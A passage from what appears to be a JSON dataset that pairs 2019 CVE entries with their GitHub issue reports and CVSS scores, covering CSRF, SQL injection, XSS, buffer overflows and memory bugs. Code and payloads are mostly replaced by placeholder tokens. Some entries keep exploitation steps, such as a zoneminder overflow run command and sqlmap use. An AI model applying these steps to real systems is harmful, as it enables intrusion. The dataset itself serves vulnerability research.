  43139. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/8",
  43140. "Repo_new": "teameasy/easycms",
  43141. "Issue_Created_At": "2019-01-15T09:48:11Z",
  43142. "description": "There is one CSRF vulnerability that can add the user account . After the administrator logged in, open the following page poc\uff1a APITAG add a user ''' APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG '''",
  43143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43144. "severity": "HIGH",
  43145. "baseScore": 8.8,
  43146. "impactScore": 5.9,
  43147. "exploitabilityScore": 2.8
  43148. },
  43149. {
  43150. "CVE_ID": "CVE-2019-6295",
  43151. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/12",
  43152. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/12",
  43153. "Repo_new": "yanchongchong/swallow",
  43154. "Issue_Created_At": "2019-01-15T08:21:23Z",
  43155. "description": "1. ERRORTAG",
  43156. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43157. "severity": "CRITICAL",
  43158. "baseScore": 9.8,
  43159. "impactScore": 5.9,
  43160. "exploitabilityScore": 3.9
  43161. },
  43162. {
  43163. "CVE_ID": "CVE-2019-6446",
  43164. "Issue_Url_old": "https://github.com/numpy/numpy/issues/12759",
  43165. "Issue_Url_new": "https://github.com/numpy/numpy/issues/12759",
  43166. "Repo_new": "numpy/numpy",
  43167. "Issue_Created_At": "2019-01-16T02:36:51Z",
  43168. "description": "numpy load function with evil data will cause command execution. numpy load function with evil data will cause command execution; if an attacker shares evil data on the internet and a user loads it, it will cause command execution. Reproducing code example: CODETAG APITAG version information NUMBERTAG",
  43169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43170. "severity": "CRITICAL",
  43171. "baseScore": 9.8,
  43172. "impactScore": 5.9,
  43173. "exploitabilityScore": 3.9
  43174. },
  43175. {
  43176. "CVE_ID": "CVE-2019-6486",
  43177. "Issue_Url_old": "https://github.com/golang/go/issues/29903",
  43178. "Issue_Url_new": "https://github.com/golang/go/issues/29903",
  43179. "Repo_new": "golang/go",
  43180. "Issue_Created_At": "2019-01-23T21:47:29Z",
  43181. "description": "crypto/elliptic: CPU APITAG vulnerability affecting P NUMBERTAG and P NUMBERTAG A APITAG vulnerability in the crypto/elliptic implementations of the P NUMBERTAG and P NUMBERTAG elliptic curves may let an attacker craft inputs that consume excessive amounts of CPU. These inputs might be delivered via TLS handshakes NUMBERTAG certificates, JWT tokens, ECDH shares or ECDSA signatures. In some cases, if an ECDH private key is reused more than once, the attack can also lead to key recovery. This issue is CVETAG .",
  43182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  43183. "severity": "HIGH",
  43184. "baseScore": 8.2,
  43185. "impactScore": 4.2,
  43186. "exploitabilityScore": 3.9
  43187. },
  43188. {
  43189. "CVE_ID": "CVE-2019-6497",
  43190. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/1",
  43191. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/1",
  43192. "Repo_new": "fantasticlbp/hotels_server",
  43193. "Issue_Created_At": "2019-01-19T15:20:53Z",
  43194. "description": "SQL Injection Vulnerability in FILETAG . In FILETAG FILETAG the parameter was added with a string \"username=\" , passed to function find. In the definition of function find, we can notice that though the author uses PDO, he didn't use prepared statements to avoid the SQL injection vulnerability. What a pity! FILETAG After analyzing these codes, we can simply use sqlmap to exploit the vulnerability and have fun! FILETAG",
  43195. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43196. "severity": "CRITICAL",
  43197. "baseScore": 9.8,
  43198. "impactScore": 5.9,
  43199. "exploitabilityScore": 3.9
  43200. },
  43201. {
  43202. "CVE_ID": "CVE-2019-6498",
  43203. "Issue_Url_old": "https://github.com/labapart/gattlib/issues/82",
  43204. "Issue_Url_new": "https://github.com/labapart/gattlib/issues/82",
  43205. "Repo_new": "labapart/gattlib",
  43206. "Issue_Created_At": "2019-01-20T07:45:43Z",
  43207. "description": "stack based buffer overflow. Hi Team, Summary While fuzzing gattlib using clang NUMBERTAG with ASAN, a stack based buffer overflow was observed in FILETAG and FILETAG Vulnerable code from gattlib.c CODETAG Vulnerable code from notification.c CODETAG Also, I have figured out a simple way to reproduce this rather than using the AFL poc in this case. APITAG ERRORTAG notification` in this case.",
  43208. "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43209. "severity": "HIGH",
  43210. "baseScore": 8.8,
  43211. "impactScore": 5.9,
  43212. "exploitabilityScore": 2.8
  43213. },
  43214. {
  43215. "CVE_ID": "CVE-2019-6498",
  43216. "Issue_Url_old": "https://github.com/labapart/gattlib/issues/81",
  43217. "Issue_Url_new": "https://github.com/labapart/gattlib/issues/81",
  43218. "Repo_new": "labapart/gattlib",
  43219. "Issue_Created_At": "2019-01-20T07:33:47Z",
  43220. "description": "stack based buffer overflow. Hi Team, Summary While fuzzing gattlib using clang NUMBERTAG with ASAN, a stack based buffer overflow was observed in FILETAG and FILETAG Vulnerable code from gattlib.c CODETAG Vulnerable code from discover.c CODETAG Also, I have figured out a simple way to reproduce this rather than using the AFL poc in this case. APITAG ASAN ERRORTAG I have also written a quick MSF module for this, specifically the APITAG part CODETAG In addition, a memory leak was also observed in this case. ERRORTAG OR to verify, APITAG Requesting the team to have a look and validate.",
  43221. "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43222. "severity": "HIGH",
  43223. "baseScore": 8.8,
  43224. "impactScore": 5.9,
  43225. "exploitabilityScore": 2.8
  43226. },
  43227. {
  43228. "CVE_ID": "CVE-2019-6502",
  43229. "Issue_Url_old": "https://github.com/OpenSC/OpenSC/issues/1586",
  43230. "Issue_Url_new": "https://github.com/opensc/opensc/issues/1586",
  43231. "Repo_new": "opensc/opensc",
  43232. "Issue_Created_At": "2019-01-20T17:08:17Z",
  43233. "description": "Memory leak. Hi Team, I have built this repo using clang with ASAN; a memory leak was detected in APITAG ASAN ERRORTAG eidenv.c ERRORTAG",
  43234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43235. "severity": "HIGH",
  43236. "baseScore": 7.5,
  43237. "impactScore": 3.6,
  43238. "exploitabilityScore": 3.9
  43239. },
  43240. {
  43241. "CVE_ID": "CVE-2019-6503",
  43242. "Issue_Url_old": "https://github.com/chatopera/cosin/issues/177",
  43243. "Issue_Url_new": "https://github.com/cskefu/cskefu/issues/177",
  43244. "Repo_new": "cskefu/cskefu",
  43245. "Issue_Created_At": "2019-01-22T03:49:20Z",
  43246. "description": "\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e. \u63cf\u8ff0 APITAG \u73b0\u5728\u884c\u4e3a APITAG FILETAG \u8ddf\u8fdb\u8be5\u65b9\u6cd5\u4e2d\uff0c\u53d1\u73b0\u76f4\u63a5\u5bf9\u6587\u4ef6\u5185\u5bb9\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c FILETAG \u9884\u671f\u884c\u4e3a \u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u4e0a\u4f20\u6076\u610f\u6784\u9020\u7684\u6587\u4ef6\uff0c\u5728\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002 \u89e3\u51b3\u65b9\u6848 \u767d\u540d\u5355 \u73af\u5883 \u4ee3\u7801\u7248\u672c: Git commit hash ( APITAG )",
  43247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43248. "severity": "CRITICAL",
  43249. "baseScore": 9.8,
  43250. "impactScore": 5.9,
  43251. "exploitabilityScore": 3.9
  43252. },
  43253. {
  43254. "CVE_ID": "CVE-2019-6507",
  43255. "Issue_Url_old": "https://github.com/creditease-sec/insight/issues/42",
  43256. "Issue_Url_new": "https://github.com/creditease-sec/insight/issues/42",
  43257. "Repo_new": "creditease-sec/insight",
  43258. "Issue_Created_At": "2019-01-22T13:59:31Z",
  43259. "description": "There are four CSRF vulnerability that can delete user and etc. vulnerability file: FILETAG NUMBERTAG line NUMBERTAG ERRORTAG NUMBERTAG line NUMBERTAG CODETAG NUMBERTAG line NUMBERTAG ERRORTAG NUMBERTAG line NUMBERTAG ERRORTAG poc NUMBERTAG Post one drops or comment contains this APITAG NUMBERTAG Wait admin to login and access the APITAG admin query the img , one user will be deleted.",
  43260. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43261. "severity": "HIGH",
  43262. "baseScore": 8.8,
  43263. "impactScore": 5.9,
  43264. "exploitabilityScore": 2.8
  43265. },
  43266. {
  43267. "CVE_ID": "CVE-2019-6707",
  43268. "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/1",
  43269. "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/1",
  43270. "Repo_new": "kk98kk0/exploit",
  43271. "Issue_Created_At": "2019-01-03T12:49:43Z",
  43272. "description": "PHPSHE NUMBERTAG FILETAG APITAG Vulnerability. APITAG describes Detection object NUMBERTAG website name: PHPSHE CMS system NUMBERTAG website domain name: FILETAG NUMBERTAG the IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C system NUMBERTAG build NUMBERTAG UTF8) Detection time: January NUMBERTAG Description of vulnerability: Lingbao APITAG network technology co., LTD. PHPSHE CMS system SQL injection vulnerability NUMBERTAG POC and verification Local construction environment NUMBERTAG download PHPSHE NUMBERTAG mall system at FILETAG NUMBERTAG the background to FILETAG the user/password is admin/admin NUMBERTAG erify by the following POC verification methods. Vulnerability injection point: CODETAG vulnerability verification: APITAG NUMBERTAG TXT file contents: CODETAG FILETAG current user: 'root APITAG Code audit: Setup the environment locally. APITAG Line NUMBERTAG of FILETAG enters the FILETAG logic after the submission. FILETAG NUMBERTAG Pe_update function updates the database product=product APITAG FILETAG NUMBERTAG Pe_update function calls _dowhere to process conditional statements. FILETAG NUMBERTAG dowhere function Sql splicing. FILETAG NUMBERTAG When sqlwhere statement is returned after splicing, please note that the malicious code has been spliced successfully FILETAG NUMBERTAG Finally, the database was updated successfully FILETAG FILETAG FILETAG",
  43273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  43274. "severity": "HIGH",
  43275. "baseScore": 7.2,
  43276. "impactScore": 5.9,
  43277. "exploitabilityScore": 1.2
  43278. },
  43279. {
  43280. "CVE_ID": "CVE-2019-6708",
  43281. "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/2",
  43282. "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/2",
  43283. "Repo_new": "kk98kk0/exploit",
  43284. "Issue_Created_At": "2019-01-06T12:51:46Z",
  43285. "description": "PHPSHE NUMBERTAG FILETAG APITAG Vulnerability NUMBERTAG ulnerability description Test object NUMBERTAG website: PHPSHE shopping system NUMBERTAG the website domain name: FILETAG NUMBERTAG IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C mall system NUMBERTAG build NUMBERTAG UTF8) Detection time: January NUMBERTAG ulnerability description: Lingbao Jianhao network technology co., LTD. PHPSHE cms system background SQL injection vulnerability. POC and validation Local setup environment NUMBERTAG download PHPSHE NUMBERTAG cms system at FILETAG NUMBERTAG the background to FILETAG the password is admin/admin NUMBERTAG erify by the following POC verification methods. Vulnerability injection point: ERRORTAG Vulnerability verification method: APITAG NUMBERTAG TXT file contents: CODETAG Vulnerability identification FILETAG FILETAG The solution Background avoid parameter splicing. Code audit: Local environment. FILETAG APITAG The FILETAG line NUMBERTAG execution flow introduces the FILETAG line NUMBERTAG pe_selectall function to count the order list. FILETAG The pe_selectall function is defined on line NUMBERTAG of FILETAG . FILETAG The Pe_selectall function handles conditional statements through the _dowhere APITAG sql_selectall function displays the number of transactions per APITAG malicious SQL is spliced in the _dowhere APITAG injection successful. FILETAG",
  43286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  43287. "severity": "HIGH",
  43288. "baseScore": 7.2,
  43289. "impactScore": 5.9,
  43290. "exploitabilityScore": 1.2
  43291. },
  43292. {
  43293. "CVE_ID": "CVE-2019-6719",
  43294. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/111",
  43295. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/111",
  43296. "Repo_new": "mz-automation/libiec61850",
  43297. "Issue_Created_At": "2019-01-15T11:05:33Z",
  43298. "description": "Heap Use After Free in server_example_goose. Hi Team, There is Heap Use After Free in server_example_goose, Snip FILETAG APITAG Starting server failed! Exit. APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG e NUMBERTAG dcc8 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG fdf9f6fedc0 sp NUMBERTAG fdf9f6fedb0 READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG dcc8 thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG dffe in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c in APITAG PATHTAG NUMBERTAG adbb in APITAG PATHTAG NUMBERTAG dea5 in APITAG PATHTAG NUMBERTAG fdfa NUMBERTAG b6b9 in start_thread ( PATHTAG NUMBERTAG fdfa NUMBERTAG b NUMBERTAG c in clone ( PATHTAG NUMBERTAG e NUMBERTAG dcc8 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fdfa2b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in Memory_free PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG dc7 in APITAG PATHTAG NUMBERTAG aa3a in APITAG PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG fdfa2b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e NUMBERTAG e in Memory_calloc PATHTAG NUMBERTAG da7f in APITAG PATHTAG NUMBERTAG ea8 in APITAG PATHTAG NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG a NUMBERTAG d in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) Thread T1 created by T0 here NUMBERTAG fdfa2ac NUMBERTAG in pthread_create ( PATHTAG NUMBERTAG df2e in Thread_start PATHTAG NUMBERTAG af4f in APITAG PATHTAG NUMBERTAG b4 in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap use after free PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG 
c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd NUMBERTAG c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c1c7fff9bb0: fa fa fa fa NUMBERTAG c1c7fff9bc NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9bd NUMBERTAG c1c7fff9be NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  43299. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43300. "severity": "HIGH",
  43301. "baseScore": 7.5,
  43302. "impactScore": 3.6,
  43303. "exploitabilityScore": 3.9
  43304. },
  43305. {
  43306. "CVE_ID": "CVE-2019-6777",
  43307. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2436",
  43308. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2436",
  43309. "Repo_new": "zoneminder/zoneminder",
  43310. "Issue_Created_At": "2019-01-23T08:03:50Z",
  43311. "description": "Reflective XSS vulnerability. Describe Your Environment APITAG NUMBERTAG Describe the bug Reflective XSS vulnerability To Reproduce APITAG has one reflective XSS vulnerability FILETAG line NUMBERTAG The parameters in the request are accepted at NUMBERTAG lines, and the page is output at NUMBERTAG lines without verification. FILETAG FILETAG Expected behavior The vulnerability can lead to user information leakage and unauthorized operation Debug Logs APITAG quotes so they are formatted properly> `",
  43312. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43313. "severity": "MEDIUM",
  43314. "baseScore": 6.1,
  43315. "impactScore": 2.7,
  43316. "exploitabilityScore": 2.8
  43317. },
  43318. {
  43319. "CVE_ID": "CVE-2019-6779",
  43320. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/3",
  43321. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/3",
  43322. "Repo_new": "chshcms/cscms",
  43323. "Issue_Created_At": "2019-01-24T14:51:59Z",
  43324. "description": "There is a CSRF vulnerability that can PATHTAG friend links. just use add friend links for example: After the admin has logged in, we can send him a url with this code on that page APITAG CODETAG after he clicks that button, we can add our malicious link to the friend links: admin page: APITAG homepage: APITAG",
  43325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  43326. "severity": "HIGH",
  43327. "baseScore": 8.1,
  43328. "impactScore": 5.2,
  43329. "exploitabilityScore": 2.8
  43330. },
  43331. {
  43332. "CVE_ID": "CVE-2019-6802",
  43333. "Issue_Url_old": "https://github.com/pypiserver/pypiserver/issues/237",
  43334. "Issue_Url_new": "https://github.com/pypiserver/pypiserver/issues/237",
  43335. "Repo_new": "pypiserver/pypiserver",
  43336. "Issue_Created_At": "2019-01-24T17:43:58Z",
  43337. "description": "CRLF injection via new line characters in URI. Summary pypiserver doesn't escape new line characters when redirecting users. I'm not too sure if this is only in the default installation, or that if users used a redirect functionality it would additionally be vulnerable. Steps to Reproduce NUMBERTAG Download pypiserver and host a default installation NUMBERTAG Open URLTAG NUMBERTAG Observe cookie being set Impact Create arbitrary HTTP responses, set malicious cookies, potential for XSS depending on implementation (i.e. location header doesn't redirect to a valid host and therefore displays whatever content is available)",
  43338. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43339. "severity": "MEDIUM",
  43340. "baseScore": 6.1,
  43341. "impactScore": 2.7,
  43342. "exploitabilityScore": 2.8
  43343. },
  43344. {
  43345. "CVE_ID": "CVE-2019-6803",
  43346. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2124",
  43347. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2124",
  43348. "Repo_new": "typora/typora-issues",
  43349. "Issue_Created_At": "2019-01-24T14:38:57Z",
  43350. "description": "Typora XSS to RCE. The filtering rules on the left outline bar are not perfect. When the document has the following content, it will cause XSS\uff0cand this could then be escalated to RCE: eg: APITAG ERRORTAG could execute a cmd command. FILETAG the Linux and Mac versions have the same problem.",
  43351. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43352. "severity": "MEDIUM",
  43353. "baseScore": 6.1,
  43354. "impactScore": 2.7,
  43355. "exploitabilityScore": 2.8
  43356. },
  43357. {
  43358. "CVE_ID": "CVE-2019-6804",
  43359. "Issue_Url_old": "https://github.com/rundeck/rundeck/issues/4406",
  43360. "Issue_Url_new": "https://github.com/rundeck/rundeck/issues/4406",
  43361. "Repo_new": "rundeck/rundeck",
  43362. "Issue_Created_At": "2019-01-22T21:38:39Z",
  43363. "description": "Security: stored XSS vulnerability. Describe the bug A stored XSS vulnerability exists in the Job Edit page My Rundeck detail Rundeck version NUMBERTAG install type: any To Reproduce (forthcoming)",
  43364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43365. "severity": "MEDIUM",
  43366. "baseScore": 6.1,
  43367. "impactScore": 2.7,
  43368. "exploitabilityScore": 2.8
  43369. },
  43370. {
  43371. "CVE_ID": "CVE-2019-6966",
  43372. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/361",
  43373. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/361",
  43374. "Repo_new": "axiomatic-systems/bento4",
  43375. "Issue_Created_At": "2019-01-25T07:49:22Z",
  43376. "description": "failed to allocate APITAG in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to failed allocate APITAG in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash3.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  43377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43378. "severity": "MEDIUM",
  43379. "baseScore": 6.5,
  43380. "impactScore": 3.6,
  43381. "exploitabilityScore": 2.8
  43382. },
  43383. {
  43384. "CVE_ID": "CVE-2019-6978",
  43385. "Issue_Url_old": "https://github.com/libgd/libgd/issues/492",
  43386. "Issue_Url_new": "https://github.com/libgd/libgd/issues/492",
  43387. "Repo_new": "libgd/libgd",
  43388. "Issue_Created_At": "2019-01-15T11:09:33Z",
  43389. "description": "Update APITAG APITAG functions for possible Double free bugs. Hi, please commit the patch file.",
  43390. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43391. "severity": "CRITICAL",
  43392. "baseScore": 9.8,
  43393. "impactScore": 5.9,
  43394. "exploitabilityScore": 3.9
  43395. },
  43396. {
  43397. "CVE_ID": "CVE-2019-6988",
  43398. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1178",
  43399. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1178",
  43400. "Repo_new": "uclouvain/openjpeg",
  43401. "Issue_Created_At": "2019-01-17T14:49:50Z",
  43402. "description": "memory exhausted and hangs for a long time when using NUMBERTAG bit opj_decompress. I found a problem which will cause memory to be exhausted, and the program to hang for NUMBERTAG minutes. My test server had NUMBERTAG GB of memory. This can cause denial of service. Steps to Reproduce NUMBERTAG Download and unzip FILETAG NUMBERTAG Run APITAG NUMBERTAG When I test it using NUMBERTAG bit opj_decompress with asan, the following is the output information ERRORTAG Analysis NUMBERTAG Allocates too much memory NUMBERTAG Maybe too many cycles System Configuration version: git commit APITAG Environment: Ubuntu NUMBERTAG LTS Memory Size NUMBERTAG GB component NUMBERTAG bit opj_decompress",
  43403. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43404. "severity": "MEDIUM",
  43405. "baseScore": 6.5,
  43406. "impactScore": 3.6,
  43407. "exploitabilityScore": 2.8
  43408. },
  43409. {
  43410. "CVE_ID": "CVE-2019-6990",
  43411. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2444",
  43412. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2444",
  43413. "Repo_new": "zoneminder/zoneminder",
  43414. "Issue_Created_At": "2019-01-24T18:48:25Z",
  43415. "description": "Stored Self Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug In the view zone , a user can PATHTAG zones. While adding a zone, there exists no input filtration, allowing an attacker to inject unintended values. Later while displaying the zone names on the webpage, there exists no output filtration, leading to Self Stored based XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL Click on Add a new zone (pop up appears) Add the XSS payload into the NAME field & select any option from the Type dropdown field & click on save. Navigate back to the Affected URL, payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43416. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  43417. "severity": "MEDIUM",
  43418. "baseScore": 5.4,
  43419. "impactScore": 2.7,
  43420. "exploitabilityScore": 2.3
  43421. },
  43422. {
  43423. "CVE_ID": "CVE-2019-6991",
  43424. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2478",
  43425. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2478",
  43426. "Repo_new": "zoneminder/zoneminder",
  43427. "Issue_Created_At": "2019-01-25T03:16:25Z",
  43428. "description": "Stack based buffer Overflow /src/zm_user.cpp (zmu). Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug A Stack overflows occur when variable size data is copied into fixed length buffers located on the program stack without any bounds checking. Vulnerabilities of this class are generally considered to be of high severity since their exploitation would mostly permit arbitrary code execution or Denial of Service. To Reproduce APITAG Binary_ zmu An attacker can exploit the buffer by smashing the stack and modifying the return address of the function. This can be used to call some other function, like pointing the return address to some custom shellcode, injected into the stack. _In function_: APITAG APITAG function_: APITAG APITAG The vulnerability exists in function APITAG , in APITAG , while authenticating the user. The vulnerability exists in the login functionality. Once a username & password is supplied to the zmu binary, the username & password is passed through APITAG function in order to produce an escaped SQL string. Due to absense of any protection and limitation placed to the length of username & password, there exists a stack based buffer overflow. APITAG code _ APITAG APITAG APITAG APITAG APITAG We need to compile the binary from source, using custom flags, inorder to trigger & debug the vulnerability. APITAG to compile_ mkdir build (In zoneminder directory) cd build cmake .. DCMAKE_C_FLAGS=\" fsanitize=address g O0 fno stack protector\" DCMAKE_CXX_FLAGS=\" fsanitize=address g O0 fno stack protector\" cd src/ APITAG to run_ ./zmu U $(python c \"print 'a NUMBERTAG P admin APITAG Cause Analysis_ Vulnerable function syntax unsigned long APITAG mysql, char to, const char from, unsigned long length) Characters in the from argument are escaped & the result is placed in the to argument, of the length specified, followed by a terminating null byte . 
As per the Mysql documentation, APITAG string pointed to by from must be length bytes long. You must allocate the to buffer to be at least length NUMBERTAG bytes long. (In the worst case, each character may need to be encoded as using two bytes, and there must be room for the terminating null byte.) When APITAG returns, the contents of to is a null terminated string.\" But as per the current code, the length is calculated from the length of the username & password (from) argument & can exceed the APITAG & APITAG (to) limit, which is a fixed array (safer_username NUMBERTAG safer_password NUMBERTAG causing a stack based buffer overflow. By looking at the comments written in APITAG function APITAG the to argument array is calculated based upon the current db username size, which is of NUMBERTAG Following what's said in the documentation (length NUMBERTAG bytes long NUMBERTAG is the limit set for the to argument safer_username (same for safer_password). Ignoring the fact that there's no limit set for the username, password input received by the binary. ERRORTAG APITAG Initially the username & password pointer address remains valid, until it reaches safer_username, populating other pointer addresses with the injected payload. CODETAG ERRORTAG Here we can see how the pointer address values are populated with the injected values (a's) . Later in the code, when the pointer addresses are accessed, a segmentation fault is raised due to an invalid memory access. Expected behavior An attacker can Bypass authentication by overwriting the function pointer. It should limit the username length. Debug Logs None",
  43429. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43430. "severity": "CRITICAL",
  43431. "baseScore": 9.8,
  43432. "impactScore": 5.9,
  43433. "exploitabilityScore": 3.9
  43434. },
  43435. {
  43436. "CVE_ID": "CVE-2019-6992",
  43437. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2445",
  43438. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2445",
  43439. "Repo_new": "zoneminder/zoneminder",
  43440. "Issue_Created_At": "2019-01-24T18:53:08Z",
  43441. "description": "POST (self) Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view controlcap , displays the Name field APITAG value on the webpage with no proper filtration, leading to POST based self XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL Add the XSS payload into the NAME field & click on MOVE tab, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43443. "severity": "MEDIUM",
  43444. "baseScore": 6.1,
  43445. "impactScore": 2.7,
  43446. "exploitabilityScore": 2.8
  43447. },
  43448. {
  43449. "CVE_ID": "CVE-2019-7151",
  43450. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1881",
  43451. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1881",
  43452. "Repo_new": "webassembly/binaryen",
  43453. "Issue_Created_At": "2019-01-20T12:11:54Z",
